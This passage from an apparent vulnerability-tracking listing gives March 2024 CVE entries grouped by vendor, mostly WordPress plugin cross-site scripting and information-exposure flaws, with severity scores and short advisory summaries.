CVE-2024-0591 | Medium | 6.1 | | 2024-03-13 | The wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'A' parameter in all versions up to, and including, 3.4.2.2 due to insufficient inpu…

Toyoko Inn It Solution Co., Ltd. · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27440 | Medium | 4.8 | | 2024-03-13 | The Toyoko Inn official App for iOS versions prior to 1.13.0 and Toyoko Inn official App for Android versions prior 1.3.14 don't properly verify server certificates, which allows a man-in-the-middle attacker to spoof servers and obtain sen…

Unknown · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-7247 | Medium | 4.9 | | 2024-03-11 | The Login as User or Customer WordPress plugin through 3.8 does not prevent users to log in as any other user on the site.

Veribo, Roland Murg · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-51525 | Medium | 4.3 | | 2024-03-15 | Cross-Site Request Forgery (CSRF) vulnerability in Veribo, Roland Murg WP Simple Booking Calendar. This issue affects WP Simple Booking Calendar: from n/a through 2.0.8.4.

Veronalabs · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2194 | High | 7.2 | | 2024-03-13 | The WP Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL search parameter in all versions up to, and including, 14.5 due to insufficient input sanitization and output escaping.

Visualcomposer · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-6880 | Medium | 6.4 | | 2024-03-13 | The Visual Composer Website Builder, Landing Page Builder, Custom Theme Builder, Maintenance Mode & Coming Soon Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom fields in all versions up to, a…

Wokamoto · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0700 | Medium | 6.4 | | 2024-03-13 | The Simple Tweet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tweet this text value in all versions up to, and including, 1.4.0.2 due to insufficient input sanitization and output escaping.

Wowdevs · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2286 | Medium | 6.4 | | 2024-03-13 | The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link URL value in all versi…

Wp Codeus · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27952 | High | 7.1 | | 2024-03-13 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Codeus Advanced Sermons allows Reflected XSS. This issue affects Advanced Sermons: from n/a through 3.2.

Wp-eventmanager · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0976 | Medium | 6.1 | | 2024-03-13 | The WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the plugin parameter in all versions up to, and including, 3.1.41 due to insuffic…

Wpchill · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1083 | Medium | 5.3 | | 2024-03-13 | The Simple Restrict plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.6 via the REST API.

Wpmaspik · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25101 | Medium | 5.9 | | 2024-03-13 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in yonifre Maspik – Spam Blacklist allows Stored XSS. This issue affects Maspik – Spam Blacklist: from n/a through 0.10.6.

Wpmu Dev · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25592 | Medium | 5.9 | | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPMU DEV Broken Link Checker allows Stored XSS. This issue affects Broken Link Checker: from n/a through 2.2.3.

Wpmudev · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0368 | High | 8.6 | | 2024-03-13 | The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.8.3 via hardcoded API Keys.

Wpvivid · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1383 | Medium | 6.1 | | 2024-03-13 | The WPvivid Backup for MainWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 0.9.32 due to insufficient input sanitization and output escaping.

Zemena · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1853 | Medium | 5.5 | | 2024-03-14 | Zemana AntiLogger v2.74.204.664 is vulnerable to an Arbitrary Process Termination vulnerability by triggering the 0x80002048 IOCTL code of the zam64.sys and zamguard64.sys drivers.

Zephyrproject · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-7060 | High | 8.6 | | 2024-03-15 | Zephyr OS IP packet handling does not properly drop IP packets arriving on an external interface with a source address equal to 127.0.01 or the destination address.

Zitadel · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28197 | High | 7.5 | | 2024-03-11 | Zitadel is an open source identity management system.